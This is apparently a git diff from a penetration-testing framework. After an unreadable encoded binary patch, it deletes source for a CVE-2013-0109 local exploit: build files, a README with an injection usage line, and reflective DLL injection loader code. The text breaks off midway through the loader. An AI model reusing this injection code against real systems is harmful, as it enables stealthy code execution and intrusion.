zXg{^hFY+!ZEh}A!6MelcDi6{jXbOK9hZ0c*;e+sEuY-fV!3UmaL2?{k+B?L@@T`@i z_y~AQyW?w68$K6SY4Sr@%Z0A{k2{I&ZSdWK*@Di|(LW`aD(Si=%o|yl9X2<+`_@|B zJ@!Xm!2Df%z6Nco8XL3R7+K;|zp|@e+TDHSi7xlin3AO0wJ^`f{!HcqDeRAIDlML#U?Z5>P1iUo_e+M2L0uA}* zYYx}XFst7P>U}Gy_s2m+6K+wMfxh}CPW@K&Lj54ft%Kmu0<eYPkNPl) z49bDBmjDMpp4E8PlA9uHM z7Ona!sE#Tnvh1DWAbWUd1;k*nG1 zjDOg7+Y%}?SbzXY*wEaKU(Zn@^sxrlK}5q?J@7C_6s#vu5PH;B>8;T6X7w%TT!!ch zEsn1wbc~jC3PVV7#_6$EuxO$9V5P@;xF>cP{sZFP*x#PRP(DV9OTQwd#1m=%!j5IM z*>_uUL4huU5SIO=C4SRnBW!%lO7gZgoQ9V*2}esZ0(>X( zMHj^d@QOuIWEU9v_)A!I#5GRuHX)|smm`LB*U+}sqzt29p%~kpn+GdrNL~L1&`J|d zI3J=skdDb-X*u~J2`6L3p)n9_95fb%HV8Wn$ZkKBf=inr21{TcTM2gqsZwBN*fT)7 zbNF8-fp|9J`<1e0!W{A~eQPjkm<>fHA$f^X_9T)CEZh&qm%;l#QOYI?G7M76;z#9R?t{)+P2ZU3};Zps_GYR<1OF670K%V?Y?D#>PD` zoHj<@gU$%wd#wIdbOC;9XX6AMQEfC^a{qQ%*CBW*GQ+jE*B&xOq@I)kq$BTB0V~`|x zHTtLuwg6GB0D6gbhN=8Cw4uc6$Kdvlh)b^2Ucujw!u+uxhR=sL@+Yw?jNYrIp9E+J z&Q@&w-e(qkcoTLAtuzAP1uTiW^yM7!4V{6{=S1z!aDTbns$}7Q@E5cojesD0)M0t(d*3`e&4E!>J-5efsa9Frhd@H&?HZc}UpIV%5kUW4e%{~5jf-BBDOyU zFslA?0TAYw6j7j@Dea`gJz)u8_Ewtx$eZhb_ID&zN%%ZgBTYk1vB?OZC&UMjVn46f zZ)|Vuk9<)RDSQVOUw0vSH*P51lHYH#zhZIXx;;!V59)}=?T&^7k<@ImH(H!)zQHE` zKpNB`w9_*FU|4P;WA1bNF{Mh%R2DbIq}+r|*G^e#QYH)q_k_7)%CtCTG$Kb#S!z}s zxCMgWw;9?2<5@JQY3rEK;dV7-YC5+cLZKw5HpBrJ6!R4jK&F%D_G5XHTg|swO+jdXe zanG(aqSLiQI~o$@>rneO$ce4jl&`81ru=nXT-=vaTHtGfuX##47G&7`A9fv_(k>5y zjh3!g#hv?vg%{G!D28Z^eq=q5s}I9kY4@xQ!H(W??sMEhC_eXj^cn=NG?7+XOWrO?SL3+}&uw__#4{Jq5AQ-x;(o_ajL!1G%?f5a2Q(}w3uJl%M#uSwEaJQMNUiDw?3 z3OtYEc^uEL@cbUn_y5e-NRH9Pk|X;*$?^Ap8|ax|X_DhLqXhIETgK@x;?#R;J`7 z$n>}_r=?jb+PcKQ1b-mj>h<`u0zyiZtX4Qy{G*_Bm*fFHbMT%m zxujdAo1{GWW>a=4f5n>os^!bcEnY7Bmab5Qf5ssHv=u8>-AAy~S5`UCLH;KP`JWo(r;qo<^6nhur&)|vb(AM8`U|82X$o5KAl_^6kN%cL|4qau zurT^BO~g^m!_j||NV!?W-z?%NuNSfOH!bSsfg<DJZlh7f3pM!J>2hK326G8hMZN>1Ly_9aVh-wiMu2DNWT{$Ma0GO zEft(dP!wa}D}hT0M@cg9!UbZ150yI)+l(2kI>^wjX4i^IFm4osWBmL4a)lE22eHj0u9^C5^ zWmA~SBiyMR!j>EI3gO-w7qUmAHH#-CJJc=NJlH^YNJFS>skp1kGv zEr0Od<)XvqtXkXezxzIU6-5^>UoFQXrz!U3}4}@l_IrRiMmT=$}1tC1b7K>5?~~xO9?eKn`>%o 
zFoBsj*KGd3+PfC`D5|SJf$#~48a3J=C<8?eErglb$L!8CAqf%*up~hqMq$ZL$jZLl z-Gsyk1O%lPEh@gFAfjSLjV&lz+6GH2B2`rC1EWnXwrHv1`>p+-ncZY}Lo}7&*M6VB z%>4d)=f2K8=iGD8y*qbicUg1pfC2DeD^{!+03Xjadz$G-DD%&Bd1f}lKf#H4JS)Kp zo8P>$8MPR=vAVjtfdh|fj6@biB5D4MEH{K6^kXy`7>P8VqUftAuIV_28El4C@M+V~ zdzEQrtlUbb47PpNVRFd!r=jnQ%o3^8lXQuA1>?kD#oBOE>NwCT0!P+3rSZxFVSLgk zB_5}Mi!$)TnjX?;rq!BU2hFl|kS2yJFFvUT`H29=1^F8q1Aa)n0I`rcZv3X-NTo&j zezfUFegK~rCCZTn4>m2_qEF>~$geT;Y1B}gELx-S%pxa*&nECrtx{eDCsDL&_{}j< zfSfW@N{ea`spO4Vv*beXZ}A?-$Rg=!Mu>r8z$_DHYLQ0tXx>XoMt-47PvcBI1<^M7 zFB&6AXW={A;d{$l9E!$3P_(MQFl#+OdiR4EFVkqSyt0kv&7_yye08f z&}mD_{uVm>JA}FwAiufz|U$Ki!Ik-+ak~}5#b~p)q8Tu9&S7&|d zZLc{hEO}^j9gYTT+8o(!l9#UWDllRvy(AyK>%T>4>+mgh@59vgoZq268c8%pze{_L z&h{d(NvrQ0Kr0HGG~WlHweBM)ITpJ#X4#>@*gNUl*O~hFn!d~O0SmvC{&%sL^p$o0Pw69Fq3Q zE5zYX$&c2dEX@M6;!Nt+^30@}WFJ{{xRn0sy*&_B%Ld6VXwIhDJC#2!rGI))m)5GZ z4o*^xb#j~RcMjifs2!T0Ytb)ZQ#a%_Xs(MOPS@ncX?CKS&e9Cc9+r2v>X3DH>4NNv zzSFhcjvt;vScj0lOXMJ=mB-H8m>l{t7(sYEr6W9n(p#9E6Db{G9zq7;Pz0^FGC6pQ zfhj~d4B?(zn4IAVn-StIAf^x@UbggFRDB4lsG-Xg*;ZeVg~A=iQMB7{2- z(!*Wb5aL!f(}Hk{IW}m1q%l)#%6tyeNN&q36f-}@$zsHiWs?P4tE+Nc(YJ-ZBiVx#F3ajV`(^d+Ox7oPkL>)m5kM{F;!L(kv99YJ{G8Fhb7Yq9 zowQx0a+t1b>nbaYykPUvWtS~qarqT1e{$tdS6y}W&sJY^?R9Iezv0H4ZocK#mfLP$ zyY7zlcW$`r?t3=g`}6xY-T%OYtq=X;mz%dd{K(cvAN$p|U;pN}ZQCFJ-HzY?;fbA3 z?s{tXAD@0^&$G`xzxPisy!g_~`(9~(^|e2D{N?q(?tkNNe?Rc%TmLxt&$r(>^zM7_ zfAHZ)AAj=cXP1`Zm0^pInYJuc_?6Hd%M>Es{e4LxPp@KaA4 z!HyjD!_lXoac2IQAN_djxPtKb!&g(h<;!7@FyyU+v|9`vvBi4V>gyNFYiDykJJ9~2Zl&RA^(<>^g z@KZdqX3w$o-*f)|3H{?nbmD&VOn=B1UQ`+P#{IbGg!CCPBRXyV1x8K0EL0ng2F;9_ z7&FK#_r~HyHF1A~;R#3TBW9Wvx5zM4a0lDFz?cwjoXO0T^| zR}E%Hj$~(qyz>JF8xONJQNtTI*pN49_*kOC<|lMj8jXgd`D0j>=$y+np5A!g7<17F zS|w$bo#af~GBoQw*o1yxhw86fQXxB!=!36)_I2$m~*<;yInDu$%UKYBb zhQa=zK^3S#5_NC1lLQ)=Q11_zbdAPHAncE`1qB5b-=>gpZ_PrsCLCVqH(2hBMv1aO zoAN>p4Y7ur0;ADj=X+x*+1On;f}@SeIdmWHq=H06Wl3f1{kNrEbMwo$EL!yVG^N8% z6GO37eRg<$th&Oe4PXSo&`Zk8%R)37U=2tntr*qO&g{9qK%gMvo1b6{f5!=9Vi-IE 
zeAojIYS32+2G5(AVKP2_1SUxw$vA$MBt4%^&rhxY&`A6fB=Al3Ln0o*NzlAB_4%WXmdoD#$QJ_|LA>!VR46tAiyCtv1cm|e7&7WQER_lGb~FqfO9!oeU2mit5C zs4ct7hz9*3%xRr_(rqcUl8Mh}&j{6-Z1_qWYp?+a4+)-$D05dfw!M4K?q3!wG3M7V zSYSjwQ6mNhnYWoz;-{GAxf*Yv((<@?qN;zn;cYOwrN4#psdD^2yDAV%?5RIN*AU*? zci%~|&RzIFP|Vz$f2Us=wTNB#g@&&zgjqaDj4*km@hM?neITJ_EPi4n53PR8*%+^Y zq}GK(lXXj}E-9$U=YwF_<9w#yB*Pmq8)U*n#p=1@a6Pr;gSX)XI^ zn5WHHi4luO!%fUR{ioL((I$@(HJ6p48pD(Y=5ifzRpqZ)n9$1h?$!p=Z8D{7ieaO- z$`8I{ru?{KqGovyiH;w@2d$!F55tI5ep=}ix*iORgEjbl#bo+ep)z^d74g7~&>}2< znWs!XE#rC4ysj{;nBKoU?8Ug4AH_y7>>#(h{*Zc$*?u?_3kM8pZBt4dhJ@YcnOPG9 z^|3nQctU+`E!JoFiR}L6#Z$ZyOV^;Xpns=^tHMdOGk#NQvp=Y>QLdJ(h$tn8Fp~}G z5~DI4oruL~eH2628drNwc`9K~3^UsDHN_UEGnp%hQi}EcEX6aSp~P`p;`y8RHe=n6 zv?LB7eh@fBz>U`dTc|?D(uh3K+^*FWY14=natYGk`+)wB>Y<^(E$P5-?UAq)T6Z84 zqMNDdYM^`Kq~o3r$|v+4eH!Sk1{(3qYaKv#h2Op~?T2iLz6()E&ymqy3LY!LPLKKA zocUZAo`^G_>!SUcApq^qP)J|aD36{+OXd+>s!QQ<0MRA$rZn2Wp}iXdrH=$C-I0hF zCE~@2xCbHCsYs+(CPMN`M1M9wZPW8SL?;NaKm?#YA1pykUh({&S-u$|@w_wt;&E_{; zB!0&uD^V{QCdnk@$*`yNp7Q_Q@<}?$Fj@cm8|L(QSTeIc9^Vh0^n5eflCS5xao-R5 zNs1m#ATfjYXael_M+cDP|G6p9zY}Hk%O1D^6W_dLP0L0mI_K^`TNiiSWra)EcF@*8 zQ@FU<3^$_u_B;38$y(XnK9_!FB^4&ZExjyXlqml&%0IJy|N2vyH`X6me{Rq87vEvl zn2w2h`o8n`vCQ0k7wi+dmw*1H*E&9B7=E$E8Qs4sMkxi)Ft`9azyV`{d|)&%9LNQR z01WWK^>`;9=m6S*mw>&%9$+`H6W9T?0o#DBz-FKo*a)-$Yk*Y%m0u2A0>ptjU>;Bf zOae-PLck8NKrS!{i<0CVGX(K$;EOfj3pfbu2ik$%z&2nLa1*c`hy(M0S%3$a1QY@; zfCKUY7RUo~fPnx59J&rPfjz(ufXZ)0xCv+hRsxNH5AXn!fI?s_kPRHd&xliJB>C>v zF-Mp{|6!F%;z;AfXC|-oyFAG@R^I^~-3`6ogLm%HHvQkxkMPb$Z$LEYxfTKgnk?S& z{x&R09N8#88s&Qe@kqQ~duJD~)C@b|I(ihS^Psg^>ahmpX)KV;#8;;5o}$_1(~3%@ z)H;3FeH!S~K%WNsG|;DkJ`MC~;Javm?yu2mgYK~b%@m^}nNI5z?l9@J2Bv2oX0`QW z=3ue1->SeU-dGIpy9Juq#$X^6Q%BWDLsG1!&Io#A4_&wcT#pWP8DO!1kpr*M5ebvpemoeWty|exH4j^K$16 zuDe|M(sU^-EtXbEtEDy4O;U^Wi1d{7lGLiTX@(xrFV(l`kLf$~PjrUGJLKRkhs)ze za&x$=xi#D^+=JX-xG%Yr_&WZ2zP~U?I8Hc87$%Gq@`dq&Q&5ExVX{ym%n{}b7YGf) z5@ES;rLac0P1q=G79JIz6rKjp`-DTn$HG@aw(T_AIGbdfXgkMto-JT&w5_n+Yx|Y$ zN!x3X;aGc--D96^ztq0T{U`MwxO1oTPtHF(-*CR;JYGCQEEiXa 
z*NWT3$HkrEYvM=ZaMum4M_s>jeeUY-p5~tGHryAw7rC!+U**2ez24pGe$3tGe!=~U z`>*ad-G|&CxxaMxmyVWBkbWSIkn$zFRD-@^qIuSd2+E_CZ8*>kgt|+k)M_K$$yhaDEW$A@hImgbCp_UrShdR zK+RKssOGDZTB4Szh8k8^sH@eVt6S7xtAA9VSNE%@YG-Owv??v6)obgt5qhaUS+9o; zY}a4VnL_;L0Bqn??o6(NyMSBCZQ|Owx4GfG&X@9Y_>1_p{LlGE`FHuxc||x&n2vrA z3ghgWeWJbGJ{`9AJNuLNH|)naW;+Z=+|lH?#j)1$gyVTfyW@4o0f$#yE?y(vCf+69 zFFq>1F1{sxD1If5aOJzExvE`WSJ-v7JLqn7-|BwL%}Xw6f>b3fl$xX^(t7D$>2c`= zsa<+Q`a~KoSIe#P9{E#wxUxlgPZ^{(X;*4Hv}d(fv^TZ)v@bMHmm%5tdYyi;zLq4T zm&ch^2#)4XgKgi(eZbXVY<&!?J{i_r3_Grb4PPd#h3!5dJR)opo)X>@hS|p23SmR9 z*nVhVWS1Oujt<9Xj-#C=&bWB7*bW&Eh}XM+>CQpFTqCzAb!t#uqTZ%Hq&}h+Xy<7) zT2y;S`%wE@3+gd_iT<$uwEnuz%)>wJf|sG(2yQeda3ZI0Mcj0*nY$dk{fXPhwryA16C(jwO!!9RtM6#W%#2u8ppn+}qu!NGs*}ilEl0P3mLn%W8wR zQQM=Pt;h8>`YwGh=`4cxT@aLU*K$8bpVtdF3A}B%SRfXP6{1hPQfv_)5ZlD(#Qhi% z16`-M#=10@$2H&eFh)kZ>ob?reZKpE`(5cHX^4EGe5w4Qe4LV}oUizlOO;*97fP-= z%(U0BDyPmiHMc?CsBThQ)y?Wwb(`9z4%TwCTrE!LvOly3wHBAHe7F!_kjpd5)jQ`}ooN zSlzBG;JF<9R_i`J0Bv8QFV|N==PmjMaKBmK27kO;XVzIXR>`a7d}R_eR)-P3Mrl>H zDK9CXD0%8=wNRa>HmmDQJ+-SHDxj5dIy9yYJitE=t@s4r#x1KsqQLl0LwA`vU$aTgLyM$vJW^ zJkfBOl}F3@@>rRZ?XpXrB$vw`xk{deaXC-+$#rr-j>vJjQNBcOmY2&bWs+ize3RTF zuah^(8|6(HznkT)@;13m-XZUlcVjf~m0yzE{kvb2bDw02hhbpb%>gy=EC<4S6S#KUmdHuR0aAeQ75V8sz inject.exe 1234 - -License -======= - -Licensed under a 3 clause BSD license, please see LICENSE.txt for details. diff --git a/external/source/exploits/cve-2013-0109/dll/reflective_dll.sln b/external/source/exploits/cve-2013-0109/dll/reflective_dll.sln deleted file mode 100644 index eff992d77c..0000000000 --- a/external/source/exploits/cve-2013-0109/dll/reflective_dll.sln +++ /dev/null 
@@ -1,20 +0,0 @@ - -Microsoft Visual Studio Solution File, Format Version 10.00 -# Visual C++ Express 2008 -Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "reflective_dll", "reflective_dll.vcproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}" -EndProject -Global - GlobalSection(SolutionConfigurationPlatforms) = preSolution - Debug|Win32 = Debug|Win32 - Release|Win32 = Release|Win32 - EndGlobalSection - GlobalSection(ProjectConfigurationPlatforms) = postSolution - {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Release|Win32 - {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.Build.0 = Release|Win32 - {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|Win32 - {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.Build.0 = Release|Win32 - EndGlobalSection - GlobalSection(SolutionProperties) = preSolution - HideSolutionNode = FALSE - EndGlobalSection -EndGlobal diff --git a/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcproj b/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcproj deleted file mode 100644 index 33c6bd9515..0000000000 --- a/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcproj +++ /dev/null @@ -1,357 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj b/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj deleted file mode 100644 index b233a13c97..0000000000 --- a/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj +++ /dev/null 
@@ -1,266 +0,0 @@ - - - - - Debug - ARM - - - Debug - Win32 - - - Debug - x64 - - - Release - ARM - - - Release - Win32 - - - Release - x64 - - - - {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949} - reflective_dll - Win32Proj - - - - DynamicLibrary - v100 - MultiByte - true - - - DynamicLibrary - v110 - MultiByte - true - - - DynamicLibrary - v110 - Unicode - - - DynamicLibrary - v110 - Unicode - - - DynamicLibrary - v110 - MultiByte - false - - - DynamicLibrary - v110 - Unicode - - - - - - - - - - - - - - - - - - - - - - - - - <_ProjectFileVersion>11.0.50727.1 - - - $(SolutionDir)$(Configuration)\ - $(Configuration)\ - true - - - true - - - $(SolutionDir)$(Platform)\$(Configuration)\ - $(Platform)\$(Configuration)\ - true - - - $(SolutionDir)$(Configuration)\ - $(Configuration)\ - false - exploit - - - false - - - $(SolutionDir)$(Platform)\$(Configuration)\ - $(Platform)\$(Configuration)\ - false - - - - Disabled - WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions) - true - EnableFastChecks - MultiThreadedDebugDLL - - Level3 - EditAndContinue - - - true - Windows - MachineX86 - - - - - Disabled - WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions) - true - EnableFastChecks - MultiThreadedDebugDLL - - - Level3 - EditAndContinue - - - true - Windows - - - - - X64 - - - Disabled - WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions) - true - EnableFastChecks - MultiThreadedDebugDLL - - Level3 - ProgramDatabase - - - true - Windows - MachineX64 - - - - - MaxSpeed - OnlyExplicitInline - true - WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN_X86;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions) - MultiThreaded - true - - Level3 - ProgramDatabase - - - true - Windows - true - true - MachineX86 - - - - - - - - - MinSpace - OnlyExplicitInline - true - 
WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN_ARM;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions) - MultiThreaded - true - - - Level3 - ProgramDatabase - true - Default - - - true - Windows - true - true - $(OutDir)$(ProjectName).arm.dll - - - copy ..\ARM\Release\reflective_dll.arm.dll ..\bin\ - - - - - X64 - - - MaxSpeed - OnlyExplicitInline - true - Size - false - WIN64;NDEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;WIN_X64;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions) - MultiThreaded - true - - Level3 - ProgramDatabase - CompileAsCpp - - - $(OutDir)$(ProjectName).x64.dll - true - Windows - true - true - MachineX64 - - - copy $(OutDir)$(ProjectName).x64.dll ..\bin\ - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj.filters b/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj.filters deleted file mode 100644 index 9bb86dca22..0000000000 --- a/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj.filters +++ /dev/null @@ -1,32 +0,0 @@ - - - - - {4FC737F1-C7A5-4376-A066-2A32D752A2FF} - cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx - - - {93995380-89BD-4b04-88EB-625FBE52EBFB} - h;hpp;hxx;hm;inl;inc;xsd - - - - - Source Files - - - Source Files - - - Source Files - - - - - Header Files - - - Header Files - - - \ No newline at end of file diff --git a/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj.user b/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj.user deleted file mode 100644 index 695b5c78b9..0000000000 --- a/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj.user +++ /dev/null @@ -1,3 +0,0 @@ - - - \ No newline at end of file 
diff --git a/external/source/exploits/cve-2013-0109/dll/src/ReflectiveDLLInjection.h b/external/source/exploits/cve-2013-0109/dll/src/ReflectiveDLLInjection.h
deleted file mode 100644
index 5738497f5b..0000000000
--- a/external/source/exploits/cve-2013-0109/dll/src/ReflectiveDLLInjection.h
+++ /dev/null
@@ -1,51 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without modification, are permitted
-// provided that the following conditions are met:
-//
-// * Redistributions of source code must retain the above copyright notice, this list of
-// conditions and the following disclaimer.
-//
-// * Redistributions in binary form must reproduce the above copyright notice, this list of
-// conditions and the following disclaimer in the documentation and/or other materials provided
-// with the distribution.
-//
-// * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#ifndef _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
-#define _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
-//===============================================================================================//
-#define WIN32_LEAN_AND_MEAN
-#include
-
-// we declare some common stuff in here...
-
-#define DLL_QUERY_HMODULE 6
-
-#define DEREF( name )*(UINT_PTR *)(name)
-#define DEREF_64( name )*(DWORD64 *)(name)
-#define DEREF_32( name )*(DWORD *)(name)
-#define DEREF_16( name )*(WORD *)(name)
-#define DEREF_8( name )*(BYTE *)(name)
-
-typedef DWORD (WINAPI * REFLECTIVELOADER)( VOID );
-typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID );
-
-#define DLLEXPORT __declspec( dllexport )
-
-//===============================================================================================//
-#endif
-//===============================================================================================//
diff --git a/external/source/exploits/cve-2013-0109/dll/src/ReflectiveDll.c b/external/source/exploits/cve-2013-0109/dll/src/ReflectiveDll.c
deleted file mode 100644
index cf73a8a853..0000000000
--- a/external/source/exploits/cve-2013-0109/dll/src/ReflectiveDll.c
+++ /dev/null
@@ -1,33 +0,0 @@
-//===============================================================================================//
-// This is a stub for the actuall functionality of the DLL.
-//===============================================================================================//
-#include "ReflectiveLoader.h"
-
-// Note: REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR and REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN are
-// defined in the project properties (Properties->C++->Preprocessor) so as we can specify our own
-// DllMain and use the LoadRemoteLibraryR() API to inject this DLL.
-
-// You can use this value as a pseudo hinstDLL value (defined and set via ReflectiveLoader.c)
-extern HINSTANCE hAppInstance;
-//===============================================================================================//
-BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
-{
- BOOL bReturnValue = TRUE;
- switch( dwReason )
- {
- case DLL_QUERY_HMODULE:
- if( lpReserved != NULL )
- *(HMODULE *)lpReserved = hAppInstance;
- break;
- case DLL_PROCESS_ATTACH:
- hAppInstance = hinstDLL;
- run();
- ExitProcess(0);
- break;
- case DLL_PROCESS_DETACH:
- case DLL_THREAD_ATTACH:
- case DLL_THREAD_DETACH:
- break;
- }
- return bReturnValue;
-}
diff --git a/external/source/exploits/cve-2013-0109/dll/src/ReflectiveLoader.c b/external/source/exploits/cve-2013-0109/dll/src/ReflectiveLoader.c
deleted file mode 100644
index 594c0b8066..0000000000
--- a/external/source/exploits/cve-2013-0109/dll/src/ReflectiveLoader.c
+++ /dev/null
@@ -1,496 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without modification, are permitted
-// provided that the following conditions are met:
-//
-// * Redistributions of source code must retain the above copyright notice, this list of
-// conditions and the following disclaimer.
-//
-// * Redistributions in binary form must reproduce the above copyright notice, this list of
-// conditions and the following disclaimer in the documentation and/or other materials provided
-// with the distribution.
-//
-// * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#include "ReflectiveLoader.h"
-//===============================================================================================//
-// Our loader will set this to a pseudo correct HINSTANCE/HMODULE value
-HINSTANCE hAppInstance = NULL;
-//===============================================================================================//
-#pragma intrinsic( _ReturnAddress )
-// This function can not be inlined by the compiler or we will not get the address we expect. Ideally
-// this code will be compiled with the /O2 and /Ob1 switches. Bonus points if we could take advantage of
-// RIP relative addressing in this instance but I dont believe we can do so with the compiler intrinsics
-// available (and no inline asm available under x64).
-__declspec(noinline) ULONG_PTR caller( VOID ) { return (ULONG_PTR)_ReturnAddress(); }
-//===============================================================================================//
-
-// Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN,
-// otherwise the DllMain at the end of this file will be used.
-
-// Note 2: If you are injecting the DLL via LoadRemoteLibraryR, define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR,
-// otherwise it is assumed you are calling the ReflectiveLoader via a stub.
-
-// This is our position independent reflective DLL loader/injector
-#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
-DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader( LPVOID lpParameter )
-#else
-DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader( VOID )
-#endif
-{
- // the functions we need
- LOADLIBRARYA pLoadLibraryA = NULL;
- GETPROCADDRESS pGetProcAddress = NULL;
- VIRTUALALLOC pVirtualAlloc = NULL;
- NTFLUSHINSTRUCTIONCACHE pNtFlushInstructionCache = NULL;
-
- USHORT usCounter;
-
- // the initial location of this image in memory
- ULONG_PTR uiLibraryAddress;
- // the kernels base address and later this images newly loaded base address
- ULONG_PTR uiBaseAddress;
-
- // variables for processing the kernels export table
- ULONG_PTR uiAddressArray;
- ULONG_PTR uiNameArray;
- ULONG_PTR uiExportDir;
- ULONG_PTR uiNameOrdinals;
- DWORD dwHashValue;
-
- // variables for loading this image
- ULONG_PTR uiHeaderValue;
- ULONG_PTR uiValueA;
- ULONG_PTR uiValueB;
- ULONG_PTR uiValueC;
- ULONG_PTR uiValueD;
- ULONG_PTR uiValueE;
-
- // STEP 0: calculate our images current base address
-
- // we will start searching backwards from our callers return address.
- uiLibraryAddress = caller();
-
- // loop through memory backwards searching for our images base address
- // we dont need SEH style search as we shouldnt generate any access violations with this
- while( TRUE )
- {
- if( ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE )
- {
- uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
- // some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'),
- // we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems.
